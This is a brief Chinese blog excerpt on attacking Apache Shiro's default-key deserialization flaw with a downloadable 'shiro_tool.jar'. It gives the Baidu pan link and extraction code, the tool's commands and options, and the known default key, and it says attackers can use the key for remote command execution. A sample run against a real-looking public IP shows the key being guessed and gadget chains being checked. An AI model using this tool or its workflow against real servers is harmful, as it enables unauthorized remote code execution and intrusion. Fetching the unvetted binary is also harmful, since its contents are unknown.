- 检测工具
https://pan.baidu.com/s/1qCpm_E_Gw1VqSwkNyaWhEw udwt
- 检测命令
检测是否使用shiro:java -cp shiro_tool.jar shiro.Check http://url
java -jar shiro_tool.jar https://xx.xx.xx.xx
nocheck --> skip check target is shiro or not.
key= --> set a shiro key.
req= --> request body file 抓包保存到文件里,这里写文件名
keys= --> keys file 自定义key的文件,key按行分割,即每行写一个
(存在默认密钥:kPH+bIxk5D2deZiIxcaaaA==攻击者可利用漏洞远程执行任意命令入侵服务器)
java -jar shiro_tool.jar https://xx.xx.xx.xx
[-] target: http://47.110.35.164:8080
[-] target is use shiro
[-] start guess shiro key...
[-] use shiro key: kPH+bIxk5D2deZiIxcaaaA==
[-] check CommonsBeanutils1
[-] check CommonsCollections1
[-] check CommonsCollections2
[-] check CommonsCollections3
[-] check CommonsCollections4
[-] check CommonsCollections5
[-] check CommonsCollections6
[-] check CommonsCollections7
[-] check CommonsCollections8
[-] check CommonsCollections9
[-] check CommonsCollections10
[-] check Groovy1
[-] check JSON1
来源:oschina
链接:https://my.oschina.net/u/1179666/blog/4812363